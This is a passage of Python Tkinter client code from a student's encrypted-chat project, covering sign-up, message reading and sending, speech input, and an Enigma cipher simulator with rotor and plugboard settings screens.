bg=self.bg_color, fg="navy")
password_explanation.pack(pady=5, padx=10)
password1_entry = Entry(self.root, font='Helvetica 14', fg='blue', width=25, show="*")
password1_entry.pack(pady=5, padx=10)
password2 = Label(self.root, text="repeat password", font=self.text_font, bg=self.bg_color)
password2.pack(pady=5, padx=10)
password2_entry = Entry(self.root, font='Helvetica 14', fg='blue', width=25, show="*")
password2_entry.pack(pady=5, padx=10)
passcode = Label(self.root, text="enter passcode", font=self.text_font, bg=self.bg_color)
passcode.pack(pady=5, padx=10)
passcode_entry = Entry(self.root, font='Helvetica 14', fg='blue', width=25, show="*")
passcode_entry.pack(pady=5, padx=10)
button_enter = Button(self.root, text="sign in",
command=lambda: self.submit_sign_in(user_name_entry,
id_entry, password1_entry,
password2_entry,
passcode_entry))
button_enter.pack(pady=5, padx=10)
button_enter = Button(self.root, text="go to log in", command=self.log_in)
button_enter.pack(pady=5, padx=10)
    def submit_sign_in(self, user_name, id_widget, password1, password2, passcode):
        """
        Send the sign-up data to the server (RSA-encrypted) and display the
        server's verdict, counting failures towards the 3-strike lockout.

        :param user_name: Entry widget holding the username
        :param id_widget: Entry widget holding the id
        :param password1: Entry widget holding the chosen password
        :param password2: Entry widget holding the repeated password
        :param passcode: Entry widget holding the passcode
        :return:
        """
        username_txt = user_name.get()
        id_txt = id_widget.get()
        password1_txt = password1.get()
        password2_txt = password2.get()
        passcode_txt = passcode.get()
        # announce the request type first (plain pickled string)
        self.my_socket.send(dumps("sign in"))
        # current time as "HHMM" — presumably for passcode validation;
        # confirm against the server implementation
        now = datetime.now()
        current_time = now.strftime("%H:%M:%S").split(":")
        time = current_time[0] + current_time[1]
        # wire format: semicolon-separated fields, RSA-encrypted
        sign_in_str = username_txt + ";" + id_txt + ";" + password1_txt + ";" + \
                      password2_txt + ";" + passcode_txt + ";" + time
        self.my_socket.send(self.rsa_object.encrypt(sign_in_str.encode(), self.server_key))
        response = self.rsa_object.decrypt(self.my_socket.recv(1024)).decode()
        # NOTE(review): the lockout fires on the third submission regardless
        # of whether this attempt succeeded — confirm this is intended
        if self.sign_in_tries == 2:
            self.sign_in_tries = 0
            self.after_3_wrong_attempts("sign in")
        else:
            if response != "user successfully signed in. to complete the process, log in.":
                self.sign_in_tries += 1
            # flash the server's verdict (success or error) for one second
            lbl_response = Label(self.root, text=response, font=self.title_font,
                                 bg=self.bg_color)
            lbl_response.pack(pady=5, padx=10)
            lbl_response.after(1000, lbl_response.destroy)
            # clear all fields after each submission
            user_name.delete(0, END)
            id_widget.delete(0, END)
            password1.delete(0, END)
            password2.delete(0, END)
            passcode.delete(0, END)
def choose_path(self):
"""
this function shows the paths window. the client may choose what to do.
:return:
"""
if not self.receive_thread.is_alive():
self.receive_thread.start()
self.clear_screen()
self.refresh_button = None
user_label = Label(self.root, text="Hello " + self.username, font=self.title_font,
bg=self.bg_color, height=2)
user_label.pack(pady=10, padx=50)
button_read_msg = Button(self.root, text="read messages", font=self.text_font,
height=2, width=20, command=lambda: self.read_messages(1))
button_read_msg.pack(pady=20, padx=50)
button_send_msg = Button(self.root, text="send message", font=self.text_font,
height=2, width=20, command=self.send_messages)
button_send_msg.pack(pady=20, padx=50)
button_simulator = Button(self.root, text="simulator", font=self.text_font,
height=2, width=20, command=self.simulator)
button_simulator.pack(pady=20, padx=50)
button_read = Button(self.root, text="About", font=self.text_font,
height=2, width=20, command=self.about_screen)
button_read.pack(pady=20, padx=50)
    def read_messages(self, msg_num):
        """
        Render the read-messages screen showing message number *msg_num*
        (1-based), with next/previous navigation, a refresh button and a
        toggle for the all-messages control-panel window.

        :param msg_num: 1-based index into self.msg_list of the message to show
        :return:
        """
        self.clear_screen()
        user_label = Label(self.root, text="Hello " + self.username, font=self.title_font,
                           bg=self.bg_color, height=2)
        user_label.pack(pady=5, padx=50)
        lbl_msg = Label(self.root, text="Message " + str(msg_num), font=self.title_font,
                        bg=self.bg_color)
        lbl_msg.pack(pady=5, padx=10)
        # kept on self — presumably so the receiver thread can highlight it
        # when new mail arrives; confirm against receive()
        self.refresh_button = Button(self.root, text="Refresh page", font=self.text_font,
                                     bg=self.bg_color, command=lambda: self.refresh(msg_num))
        self.refresh_button.pack(padx=10, pady=10)
        messages_frame = Frame(self.root)
        messages_frame.pack(padx=30, pady=15)
        scrollbar_msg = Scrollbar(messages_frame)
        scrollbar_msg.pack(side=RIGHT, fill=Y)
        text_widget = Text(messages_frame, width=50, height=15, font=self.text_font,
                           yscrollcommand=scrollbar_msg.set)
        text_widget.pack()
        scrollbar_msg.config(command=text_widget.yview)
        button_send = Button(self.root, text="go back", font=self.text_font,
                             height=2, width=20, command=self.go_back_read)
        button_send.pack(pady=5, side=BOTTOM)
        # note: the local name `button_send` is rebound to the toggle button;
        # the lambda below captures the variable, resolving to this widget
        button_send = Button(self.root, text="see/close message\ncontrol panel",
                             font=self.text_font,
                             height=2, width=20,
                             command=lambda: self.new_window_messages(button_send))
        button_send.pack(pady=5, side=BOTTOM)
        if self.msg_list:
            # navigation buttons only where a neighbouring message exists
            if msg_num < len(self.msg_list):
                next_msg = Button(self.root, text="next message", font=self.text_font,
                                  height=2, width=20,
                                  command=lambda: self.read_messages(msg_num + 1))
                next_msg.pack(pady=5, padx=5, side=RIGHT)
            if msg_num > 1:
                previous_msg = Button(self.root, text="previous message", font=self.text_font,
                                      height=2, width=20,
                                      command=lambda: self.read_messages(msg_num - 1))
                previous_msg.pack(pady=5, padx=5, side=LEFT)
            # msg_list entries are (message, encryption_data, sender) tuples
            text_widget.insert(END, "from: " + self.msg_list[msg_num - 1][2] + "\n")
            text_widget.tag_add('sender', '1.0', '1.end')
            text_widget.tag_config('sender', font='none 14')
            text_widget.insert(END, self.msg_list[msg_num - 1][0])
            text_widget.tag_add('msg', '2.0', END)
            text_widget.tag_config('msg', font='none 12')
        # read-only from here on
        text_widget.config(state=DISABLED)
def refresh(self, msg_num):
"""
this function refreshes the read messages page.
:param msg_num:
:return:
"""
if self.messages_window is not None:
self.messages_window.destroy()
self.messages_window = None
self.read_messages(msg_num)
def go_back_read(self):
"""
this function makes sure that when going back
from the read window, all windows work properly.
:return:
"""
if self.messages_window is not None:
self.messages_window.destroy()
self.messages_window = None
self.choose_path()
    def new_window_messages(self, button_see_all_msgs):
        """
        Open a second Tk window listing every stored message, and rewire
        *button_see_all_msgs* so its next click closes that window instead.

        :param button_see_all_msgs: the toggle button on the read screen
        :return:
        """
        # changing the button command to closing the window
        button_see_all_msgs.config(command=lambda: self.close_window(button_see_all_msgs))
        # creating the chat Tk object; closing it via the window manager goes
        # through close_window too, so the toggle button stays consistent
        self.messages_window = Tk()
        self.messages_window.resizable(False, False)
        self.messages_window.config(bg=self.bg_color)
        self.messages_window.protocol("WM_DELETE_WINDOW",
                                      lambda: self.close_window(button_see_all_msgs))
        chat_label = Label(self.messages_window, text="Hello " + self.username +
                                                      "\nHere are your messages",
                           bg=self.bg_color, font=self.title_font)
        chat_label.pack(padx=20, pady=10)
        chat_frame = Frame(self.messages_window)
        chat_frame.pack(padx=15, pady=15)
        scrollbar_chat = Scrollbar(chat_frame)
        scrollbar_chat.pack(side=RIGHT, fill=Y)
        text_chat = Text(chat_frame, width=30, height=15, font=self.text_font,
                         yscrollcommand=scrollbar_chat.set)
        text_chat.pack()
        scrollbar_chat.config(command=text_chat.yview)
        # each stored message is a (text, encryption_data, sender) tuple
        for msg, encryption_data, sender_user in self.msg_list:
            text_chat.insert(END, "from: " + sender_user + "\n")
            text_chat.insert(END, msg + "\n\n")
        text_chat.config(state=DISABLED)
def close_window(self, button_msgs):
"""
closing the second Tk object
:param button_msgs:
:return:
"""
if self.messages_window is not None:
self.messages_window.destroy()
self.messages_window = None
button_msgs.config(command=lambda: self.new_window_messages(button_msgs))
def send_messages(self):
"""
this function is the send window.
it allows the client to send a message.
:return:
"""
self.clear_screen()
user_label = Label(self.root, text="Hello " + self.username,
font=self.title_font, bg=self.bg_color, height=2)
user_label.pack(pady=10, padx=50)
messages_frame = Frame(self.root)
messages_frame.pack(padx=30, pady=10)
scrollbar_msg = Scrollbar(messages_frame)
scrollbar_msg.pack(side=RIGHT, fill=Y)
write_message = Text(messages_frame, width=50, height=15, font=self.text_font,
yscrollcommand=scrollbar_msg.set)
write_message.pack()
scrollbar_msg.config(command=write_message.yview)
button_speech_rec = Button(self.root, text="listen\nto speech", font=self.text_font,
height=2, width=20,
command=lambda: self.create_speech_thread(write_message))
button_speech_rec.pack(pady=10)
button_send = Button(self.root, text="send", font=self.text_font,
height=2, width=20, command=lambda: self.send(write_message))
button_send.pack(pady=10)
button_send = Button(self.root, text="go back", font=self.text_font,
height=2, width=20, command=self.choose_path)
button_send.pack(pady=10)
def create_speech_thread(self, text_widget):
"""
this function creates a thread that will listen to users input in microphone
:param text_widget:
:return:
"""
if not self.thread_speech_is_running:
thread_speech = Thread(target=self.speech_recognizer_function,
args=(text_widget,), daemon=True)
thread_speech.start()
self.thread_speech_is_running = True
def speech_recognizer_function(self, text_widget):
"""
this function recognizes the input of the microphone and turns it into text.
the text is inserted to the text widget and then the user
will be able to send it as a message
:param text_widget:
:return:
"""
label_listening = Label(self.root, text="listening to input...",
font=self.text_font, bg=self.bg_color)
label_listening.pack(pady=10)
recognizer = speech_recognition.Recognizer()
microphone = speech_recognition.Microphone()
with microphone as source:
recognizer.adjust_for_ambient_noise(source)
audio = recognizer.listen(source)
try:
text = recognizer.recognize_google(audio)
text += " "
except:
text = ""
text_widget.insert(END, text)
label_listening.destroy()
self.thread_speech_is_running = False
    def color_letter(self, letter, lst_labels, plain_text_widget, encrypted_text_widget):
        """
        Encrypt one pressed letter through the simulator enigma, flash the
        lamp label of the resulting letter for 300 ms and append the plain /
        encrypted letters to their respective text panes.

        :param letter: the uppercase letter that was pressed
        :param lst_labels: lamp labels indexed by letter (index 0 == 'A')
        :param plain_text_widget: read-only Text widget holding the plain text
        :param encrypted_text_widget: read-only Text widget holding the cipher text
        :return:
        """
        new_letter, txt_encryption = self.simulator_enigma.encrypt_letter(letter)
        # keep a per-stage trace so "See Encryption" can replay it later;
        # each line of the trace ends with the letter produced by that stage
        lst_encryption_letter_stages = [i[-1] for i in txt_encryption.split("\n")]
        # drops a stray ')' entry — presumably an artifact of the trace
        # format; confirm against Enigma.encrypt_letter's output layout
        lst_encryption_letter_stages.remove(')')
        self.simulator_encryption.append((txt_encryption, lst_encryption_letter_stages))
        # flash the lamp: ord(new_letter) - 65 maps 'A'..'Z' to 0..25
        lst_labels[ord(new_letter) - 65].config(bg="yellow")
        lst_labels[ord(new_letter) - 65].after(300, lambda: lst_labels[ord(new_letter) -
                                                                       65].config(bg="khaki"))
        # the panes are kept DISABLED so the user cannot type into them;
        # enable briefly to append one character
        plain_text_widget.config(state=NORMAL)
        plain_text_widget.insert(END, letter)
        plain_text_widget.config(state=DISABLED)
        encrypted_text_widget.config(state=NORMAL)
        encrypted_text_widget.insert(END, new_letter)
        encrypted_text_widget.config(state=DISABLED)
    def simulator(self, rotors_settings=(1, 2, 3, 'A', 'A', 'A'),
                  plugboard_settings=None, plain_text=""):
        """
        Render the enigma simulator screen: lamp board, keyboard buttons,
        plain/encrypted text panes and the action buttons.

        :param rotors_settings: (rotor1, rotor2, rotor3, pos1, pos2, pos3)
        :param plugboard_settings: plugboard wiring, or None to reset the plugboard
        :param plain_text: previously typed text to restore ("" for a fresh start)
        :return:
        """
        self.clear_screen()
        user_label = Label(self.root, text="Hello " + self.username,
                           font=self.title_font, bg=self.bg_color, height=2)
        user_label.grid(pady=10, padx=50, row=0, column=11, columnspan=5)
        # a fresh session starts with an empty per-letter encryption trace
        if plain_text == "":
            self.simulator_encryption = []
        if plugboard_settings is None:
            self.simulator_enigma.plugboard.reset_plugboard()
        self.simulator_enigma.rotors.set_rotors(rotors_settings[0], rotors_settings[1],
                                                rotors_settings[2], rotors_settings[3],
                                                rotors_settings[4], rotors_settings[5])
        simulator_title = Label(self.root, text="Enigma Simulator",
                                font=self.title_font, bg=self.bg_color)
        simulator_title.grid(row=0, column=2, columnspan=8, rowspan=2, pady=15, padx=5)
        lst_labels = []
        # plain-text pane (read-only, scrollable)
        plain_text_frame = Frame(self.root, width=300, height=200)
        plain_text_frame.grid(row=2, column=11, columnspan=5, rowspan=3, padx=10)
        plain_text_label = Label(plain_text_frame, text="Plain Text",
                                 width=12, font=self.title_font)
        plain_text_label.pack(padx=5, pady=3)
        text_widget_frame1 = Frame(plain_text_frame)
        text_widget_frame1.pack()
        scrollbar1 = Scrollbar(text_widget_frame1)
        scrollbar1.pack(side=RIGHT, fill=Y)
        plain_text_text = Text(text_widget_frame1, width=30, height=8, font=self.text_font,
                               yscrollcommand=scrollbar1.set)
        plain_text_text.pack(padx=5, pady=3)
        scrollbar1.config(command=plain_text_text.yview)
        plain_text_text.insert(END, plain_text)
        plain_text_text.config(state=DISABLED)
        # encrypted-text pane: re-encrypting plain_text both restores the
        # cipher text and advances the rotors back to their prior position
        encrypted_text_frame = Frame(self.root, width=300, height=200)
        encrypted_text_frame.grid(row=6, column=11, columnspan=5, rowspan=3, padx=10)
        encrypted_text_label = Label(encrypted_text_frame, text="Encrypted Text",
                                     width=12, font=self.title_font)
        encrypted_text_label.pack(padx=5, pady=3)
        text_widget_frame2 = Frame(encrypted_text_frame)
        text_widget_frame2.pack()
        scrollbar2 = Scrollbar(text_widget_frame2)
        scrollbar2.pack(side=RIGHT, fill=Y)
        encrypted_text_text = Text(text_widget_frame2, width=30, height=8, font=self.text_font,
                                   yscrollcommand=scrollbar2.set)
        encrypted_text_text.pack(padx=5, pady=3)
        scrollbar2.config(command=encrypted_text_text.yview)
        encrypted_text_text.insert(END, self.simulator_enigma.decrypt_encrypt_text(plain_text))
        encrypted_text_text.config(state=DISABLED)
        # lamp board: three rows of letter labels (A-J, K-T, U-Z),
        # appended to lst_labels in alphabetical order
        for i in range(65, 75):
            letter_label = Label(self.root, text=" " + chr(i) + " ", font=self.text_font,
                                 bg="khaki", relief=RIDGE, height=2, width=3)
            letter_label.grid(row=2, column=i - 64, pady=5, padx=5)
            lst_labels.append(letter_label)
        for i in range(75, 85):
            letter_label = Label(self.root, text=" " + chr(i) + " ", font=self.text_font,
                                 bg="khaki", relief=RIDGE, height=2, width=3)
            letter_label.grid(row=3, column=i - 74, pady=5, padx=5)
            lst_labels.append(letter_label)
        for i in range(85, 91):
            letter_label = Label(self.root, text=" " + chr(i) + " ", font=self.text_font,
                                 bg="khaki", relief=RIDGE, height=2, width=3)
            letter_label.grid(row=4, column=i - 82, pady=5, padx=5)
            lst_labels.append(letter_label)
        # spacer row between the lamp board and the keyboard
        label_line = Label(self.root, text=" ", font=self.text_font, bg=self.bg_color)
        label_line.grid(row=5, column=0)
        # keyboard: same three-row layout; `letter_ord=i` binds the loop
        # variable at definition time (avoids the late-binding lambda pitfall)
        for i in range(65, 75):
            letter_button = Button(self.root, text=" " + chr(i) + " ", font=self.text_font,
                                   height=2, width=3, bg="sienna2",
                                   command=lambda letter_ord=i:
                                   self.color_letter(chr(letter_ord),
                                                     lst_labels,
                                                     plain_text_text,
                                                     encrypted_text_text))
            letter_button.grid(row=6, column=i - 64, pady=5, padx=5)
        for i in range(75, 85):
            letter_button = Button(self.root, text=" " + chr(i) + " ", font=self.text_font,
                                   height=2, width=3, bg="sienna2",
                                   command=lambda letter_ord=i:
                                   self.color_letter(chr(letter_ord),
                                                     lst_labels,
                                                     plain_text_text,
                                                     encrypted_text_text))
            letter_button.grid(row=7, column=i - 74, pady=5, padx=5)
        for i in range(85, 91):
            letter_button = Button(self.root, text=" " + chr(i) + " ", font=self.text_font,
                                   height=2, width=3, bg="sienna2",
                                   command=lambda letter_ord=i:
                                   self.color_letter(chr(letter_ord),
                                                     lst_labels,
                                                     plain_text_text,
                                                     encrypted_text_text))
            letter_button.grid(row=8, column=i - 82, pady=5, padx=5)
        button_go_back = Button(self.root, text="go back to\nchoose path", font=self.text_font,
                                height=2, width=15, command=self.choose_path)
        button_go_back.grid(row=10, column=1, columnspan=4, rowspan=2, pady=20, padx=5)
        button_change_settings = Button(self.root, text="change settings", font=self.text_font,
                                        height=2, width=15, command=self.change_settings)
        button_change_settings.grid(row=10, column=5, columnspan=4, rowspan=2, pady=20, padx=5)
        button_explain = Button(self.root, text="See Encryption", font=self.text_font,
                                height=2, width=15,
                                command=lambda: self.show_simulator_encryption(rotors_settings,
                                                                               plugboard_settings,
                                                                               plain_text_text.get(
                                                                                   "1.0", END).
                                                                               replace("\n", "")))
        button_explain.grid(row=10, column=9, columnspan=4, rowspan=2, pady=20, padx=5)
        plugboard_settings_to_send = [self.simulator_enigma.plugboard.plugboard1,
                                      self.simulator_enigma.plugboard.plugboard2]
        # note: the local name `button_change_settings` is reused here for
        # the "send" button
        button_change_settings = Button(self.root, text="send encrypted\nmessage",
                                        height=2, width=15, font=self.text_font,
                                        command=lambda: self.send(plain_text_text, rotors_settings,
                                                                  plugboard_settings_to_send))
        button_change_settings.grid(row=10, column=13, columnspan=4, rowspan=2, pady=20, padx=5)
def change_settings(self):
"""
this function lets the user change the settings of the simulator
:return:
"""
self.clear_screen()
# making sure the screen grid will be organized
label_line = Label(self.root, text=" ", font=self.text_font, bg=self.bg_color)
label_line.grid(row=0, column=0)
label_line = Label(self.root, text=" ", font=self.text_font, bg=self.bg_color)
label_line.grid(row=0, column=10)
user_label = Label(self.root, text="Hello " + self.username,
font=self.title_font, bg=self.bg_color, height=2)
user_label.grid(pady=10, padx=50, row=0, column=6, columnspan=4)
settings_title = Label(self.root, text="Enigma Settings",
font=self.title_font, bg=self.bg_color)
settings_title.grid(row=0, column=2, columnspan=4, pady=15)
rotor1_num, rotor2_num, rotor3_num, rotor1_letter, rotor2_letter, rotor3_letter = \
self.simulator_enigma.rotors.get_initial_setting()
lst_roman_rotor_num = ["I", "II", "III", "IV", "V"]
rotors_number = Label(self.root, text="the rotors in the enigma",
font=self.title_font, bg=self.bg_color)
rotors_number.grid(row=1, column=3, columnspan=5, pady=5)
numbers_lst = ["I", "II", "III", "IV", "V"]
first_rotor_label_num = Label(self.root, text="First Rotor",
font=self.text_font, bg=self.bg_color)
first_rotor_label_num.grid(row=2, column=1, columnspan=3)
options_rotor1 = StringVar()
options_rotor1.set(lst_roman_rotor_num[int(rotor1_num) - 1])
rotor_num1_options = OptionMenu(self.root, options_rotor1, *numbers_lst)
rotor_num1_options.grid(row=3, column=1, columnspan=3, padx=15)
second_rotor_label_num = Label(self.root, text="Second Rotor",
font=self.text_font, bg=self.bg_color)
second_rotor_label_num.grid(row=2, column=4, columnspan=3)
options_rotor2 = StringVar()
options_rotor2.set(lst_roman_rotor_num[int(rotor2_num) - 1])
rotor_num2_options = OptionMenu(self.root, options_rotor2, *numbers_lst)
rotor_num2_options.grid(row=3, column=4, columnspan=3, padx=15)
third_rotor_label_num = Label(self.root, text="Third Rotor",
font=self.text_font, bg=self.bg_color)
third_rotor_label_num.grid(row=2, column=7, columnspan=3)
options_rotor3 = StringVar()
options_rotor3.set(lst_roman_rotor_num[int(rotor3_num) - 1])
rotor_num3_options = OptionMenu(self.root, options_rotor3, *numbers_lst)
rotor_num3_options.grid(row=3, column=7, columnspan=3, padx=15)
rotors_letters = Label(self.root, text="the letters on the rotors",
font=self.title_font, bg=self.bg_color)
rotors_letters.grid(row=4, column=3, columnspan=5, pady=5)
abc_lst = [chr(i) for i in range(65, 91)]
first_rotor_label_letter = Label(self.root, text="first Rotor",
font=self.text_font, bg=self.bg_color)
first_rotor_label_letter.grid(row=5, column=1, columnspan=3)
options_rotor_l1 = StringVar()
options_rotor_l1.set(rotor1_letter)
rotor_l1_options = OptionMenu(self.root, options_rotor_l1, *abc_lst)
rotor_l1_options.grid(row=6, column=1, columnspan=3, padx=15)
second_rotor_label_letter = Label(self.root, text="second Rotor",
font=self.text_font, bg=self.bg_color)
second_rotor_label_letter.grid(row=5, column=4, columnspan=3)
options_rotor_l2 = StringVar()
options_rotor_l2.set(rotor2_letter)
rotor_l2_options = OptionMenu(self.root, options_rotor_l2, *abc_lst)
rotor_l2_options.grid(row=6, column=4, columnspan=3, padx=15)
third_rotor_label_letter = Label(self.root, text="Third Rotor",
font=self.text_font, bg=self.bg_color)
third_rotor_label_letter.grid(row=5, column=7, columnspan=3)
rotors_letters = Label(self.root, text="the letters on the rotors",
font=self.title_font, bg=self.bg_color)
rotors_letters.grid(row=4, column=3, columnspan=5, pady=5)
options_rotor_l3 = StringVar()
options_rotor_l3.set(rotor3_letter)
rotor_l3_options = OptionMenu(self.root, options_rotor_l3, *abc_lst)
rotor_l3_options.grid(row=6, column=7, columnspan=3, padx=15)
plugboard_title = Label(self.root, text="Plugboard settings",
font=self.title_font, bg=self.bg_color)
plugboard_title.grid(row=7, column=3, columnspan=5, pady=5)
plugboard_note = Label(self.root, text="Plugboard can contain 10 pairs max",
bg=self.bg_color, font=self.text_font)
plugboard_note.grid(row=8, column=3, columnspan=5, pady=5)
lst_buttons = []
for i in range(65, 74):
plugboard_letter = Button(self.root, text=" " + chr(i) + " ", font=self.text_font,
bg="khaki", relief=RIDGE, height=2, width=3,
command=lambda letter=chr(i):
self.add_letter_in_plugboard(letter, lst_buttons))
plugboard_letter.grid(row=9, column=i - 64, pady=5, padx=5)
lst_buttons.append(plugboard_letter)
for i in range(74, 83):
plugboard_letter = Button(self.root, text=" " + chr(i) + " ", font=self.text_font,
bg="khaki", relief=RIDGE, height=2, width=3,
command=lambda letter=chr(i):
self.add_letter_in_plugboard(letter, lst_buttons))
plugboard_letter.grid(row=10, column=i - 73, pady=5, padx=5)
lst_buttons.append(plugboard_letter)
for i in range(83, 91):
plugboard_letter = Button(self.root, text=" " + chr(i) + " ", font=self.text_font,
bg="khaki", relief=RIDGE, height=2, width=3,
command=lambda letter=chr(i):
self.add_letter_in_plugboard(letter, lst_buttons))
plugboard_letter.grid(row=11, column=i - 82, pady=5, padx=5)
lst_buttons.append(plugboard_letter)
self.set_plugboard(lst_buttons)
button_save_settings = Button(self.root, text="save settings and go to simulator",
height=2, width=35, font=self.text_font,
command=lambda: self.save_settings(options_rotor1.get(),
options_rotor2.get(),
options_rotor3.get(),
options_rotor_l1.get(),
options_rotor_l2.get(),
options_rotor_l3.get()))
button_save_settings.grid(row=12, column=0, columnspan=10, rowspan=2, pady=20, padx=5)
def save_settings(self, rotor_num1, rotor_num2, rotor_num3, rotor_l1, rotor_l2, rotor_l3):
"""
this function saves the changes in the simulator settings made by the user.
:param rotor_num1:
:param rotor_num2:
:param rotor_num3:
:param rotor_l1:
:param rotor_l2:
:param rotor_l3:
:return:
"""
dict_rotor_num = {"I": 1, "II": 2, "III": 3, "IV": 4, "V": 5}
label_txt = ""
rotor_num1 = dict_rotor_num[rotor_num1]
rotor_num2 = dict_rotor_num[rotor_num2]
rotor_num3 = dict_rotor_num[rotor_num3]
if rotor_num1 == rotor_num2 or rotor_num1 == rotor_num3 or rotor_num2 == rotor_num3:
label_txt = "rotor can not be used more than once at a time"
if label_txt == "":
self.simulator((rotor_num1, rotor_num2, rotor_num3, rotor_l1, rotor_l2, rotor_l3), 1)
else:
error_label = Label(self.root, text=label_txt, font=self.text_font, bg=self.bg_color)
error_label.grid(row=14, column=0, columnspan=10, pady=10)
    def add_letter_in_plugboard(self, letter, lst_buttons):
        """
        this function adds a letter to the plugboard and refreshes the
        button colors so the display matches the new pairing state.
        :param letter: the single upper-case letter that was clicked
        :param lst_buttons: the plugboard letter buttons, in A..Z order
        :return:
        """
        self.simulator_enigma.plugboard.add_letter(letter)
        self.set_plugboard(lst_buttons)
    def set_plugboard(self, lst_buttons):
        """
        this function sets the plugboard in the simulator
        settings and lets the user edit it: each connected pair of
        letters is painted one shared color; unpaired letters stay "khaki".
        :param lst_buttons: the plugboard letter buttons, in A..Z order
        :return:
        """
        # one color per plugboard pair; each color may appear at most twice
        colors = ['purple', 'yellow', 'blue', 'orange', 'coral4', 'pink', 'cyan',
                  'SpringGreen2', 'red', 'green']
        # colors currently visible on screen (anything not the default "khaki")
        used_colors = list(filter(lambda button_bg: button_bg != "khaki",
                                  [i['bg'] for i in lst_buttons]))
        # reset buttons whose letters are no longer part of any pair
        for i in range(len(lst_buttons)):
            if chr(i + 65) not in self.simulator_enigma.plugboard.plugboard1 and \
                    chr(i + 65) not in self.simulator_enigma.plugboard.plugboard2:
                lst_buttons[i].config(bg="khaki")
        for i in range(len(self.simulator_enigma.plugboard.plugboard1)):
            # a pair whose buttons are still default-colored needs a new color
            # NOTE(review): if plugboard1[i] is already colored while
            # plugboard2[i] is None, the second condition calls ord(None) -
            # presumably plugboard1 entries stay "khaki" until paired; confirm
            if lst_buttons[ord(self.simulator_enigma.plugboard.plugboard1[i]) - 65]['bg'] \
                    == "khaki" or \
                    lst_buttons[ord(self.simulator_enigma.plugboard.plugboard2[i]) - 65]['bg'] \
                    == "khaki":
                # pick the first color not yet used by a completed pair
                color_index = 0
                while used_colors.count(colors[color_index]) == 2:
                    color_index += 1
                lst_buttons[ord(self.simulator_enigma.plugboard.plugboard1[i]) - 65]. \
                    config(bg=colors[color_index])
                used_colors.append(colors[color_index])
                # the second letter may be None while a pair is half-built
                if self.simulator_enigma.plugboard.plugboard2[i] is not None:
                    lst_buttons[ord(self.simulator_enigma.plugboard.plugboard2[i]) - 65]. \
                        config(bg=colors[color_index])
                    used_colors.append(colors[color_index])
    def show_simulator_encryption(self, rotors_settings, plugboard_settings, plain_text,
                                  letter_number=1):
        """
        this function shows the encryption process in the enigma,
        one encrypted letter at a time, as text and on a canvas, with
        next/previous navigation between letters.
        :param rotors_settings: rotor configuration restored on "go back"
        :param plugboard_settings: plugboard configuration restored on "go back"
        :param plain_text: simulator text restored on "go back"
        :param letter_number: 1-based index of the letter being displayed
        :return:
        """
        self.clear_screen()
        if len(self.simulator_encryption) > 0:
            user_label = Label(self.root, text="Hello " + self.username,
                               font=self.text_font, bg=self.bg_color)
            user_label.grid(pady=5, row=0, column=0, columnspan=5)
            lbl_encryption = Label(self.root,
                                   text="Encrypting The Letter: " +
                                        self.simulator_encryption[letter_number - 1][1][0],
                                   font=self.text_font, bg=self.bg_color)
            lbl_encryption.grid(row=1, column=0, columnspan=5, pady=5, padx=10)
            # text widget to display the stages of the encryption written
            encryption_text_widget = Text(self.root, width=30, height=19,
                                          bg="khaki", font=self.text_font)
            encryption_text_widget.grid(row=2, rowspan=7, column=0,
                                        columnspan=5, padx=10, pady=5)
            encryption_text_widget.insert(END, self.simulator_encryption[letter_number - 1][0])
            encryption_text_widget.config(state=DISABLED)
            # setting canvas to display the encryption visually
            encryption_stages_list = self.simulator_encryption[letter_number - 1][1]
            show_canvas = ShowEncryption(self.root, encryption_stages_list)
            show_canvas.set_canvas()
            # setting a next/previous button if necessary
            if len(self.simulator_encryption) > letter_number:
                next_button = Button(self.root, width=20, height=2,
                                     text="Next Letter", font=self.text_font,
                                     command=lambda:
                                     self.show_simulator_encryption(rotors_settings,
                                                                    plugboard_settings,
                                                                    plain_text,
                                                                    letter_number + 1))
                next_button.grid(row=11, column=0, columnspan=5, padx=10, pady=5)
            if letter_number > 1:
                previous_button = Button(self.root, width=20, height=2,
                                         text="Previous Letter", font=self.text_font,
                                         command=lambda:
                                         self.show_simulator_encryption(rotors_settings,
                                                                        plugboard_settings,
                                                                        plain_text,
                                                                        letter_number - 1))
                previous_button.grid(row=9, column=0, columnspan=5, padx=10, pady=5)
        else:
            # no letters were encrypted
            lbl_encryption = Label(self.root, text="No Letters Have Been Encrypted",
                                   font=self.text_font, bg=self.bg_color)
            lbl_encryption.grid(row=0, column=0, columnspan=5, pady=10, padx=10)
        button_go_back = Button(self.root, text="go back to simulator", font=self.text_font,
                                height=2, width=20,
                                command=lambda: self.simulator(rotors_settings,
                                                               plugboard_settings, plain_text))
        button_go_back.grid(row=10, column=0, columnspan=5, padx=10, pady=5)
    def about_screen(self):
        """
        this function shows the About the Project window.
        it shows information regarding the project in a read-only
        text widget, with a button back to the path-selection screen.
        :return:
        """
        self.clear_screen()
        user_label = Label(self.root, text="Hello " + self.username,
                           font=self.title_font, bg=self.bg_color, height=2)
        user_label.pack(pady=10, padx=50)
        about_text = """My name is Jasmin, I am 17 years old and this is my final project
        for 12th grade in the Cyber Bagrut.
        The project contains a multi client-server connection.
        The project includes Enigma simulator and explanations about the encryption.
        It allows chatting between all the connected users.
        Logging in and signing in is through the server.
        the client sends the user data to the server with RSA encryption,
        and the server responds appropriately.
        Encryption key of messaging is changed every 10 minutes according to the
        database enigma settings. the user can also send a message through the
        simulator, using whichever settings he wants. the setting key
        (time/settings from the simulator) are sent with RSA encryption.
        the encryption of a message is done with the Enigma machine and
        Morse code combined with ASCII afterwards."""
        lbl_about = Label(self.root, text="About The Project",
                          font=self.title_font, bg=self.bg_color)
        lbl_about.pack(pady=5, padx=10)
        about_frame = Frame(self.root, width=100, height=300, bg='white')
        about_frame.pack(padx=30, pady=20)
        # read-only widget: insert the text, then disable editing
        text_widget = Text(about_frame)
        text_widget.pack()
        text_widget.insert(END, about_text)
        text_widget.config(state=DISABLED)
        button_send = Button(self.root, text="go back to choose path", font=self.text_font,
                             height=2, width=20, command=self.choose_path)
        button_send.pack(pady=20)
def clear_screen(self):
"""
clears the screen from widgets.
:return:
"""
lst_grid = self.root.grid_slaves()
for widget in lst_grid:
widget.destroy()
lst_pack = self.root.pack_slaves()
for widget in lst_pack:
widget.destroy()
    def receive(self):
        """
        this is a thread method.
        it receives messages from sever (length-prefixed chunks followed
        by RSA-encrypted Enigma settings), then decrypts them and appends
        [decrypted_message, settings, username] to self.msg_list.
        :return:
        """
        print("waiting for messages")
        finish = False
        morse_object = Morse()
        while not finish:
            # fresh Enigma per message: each message carries its own settings
            enigma_sim = Enigma()
            try:
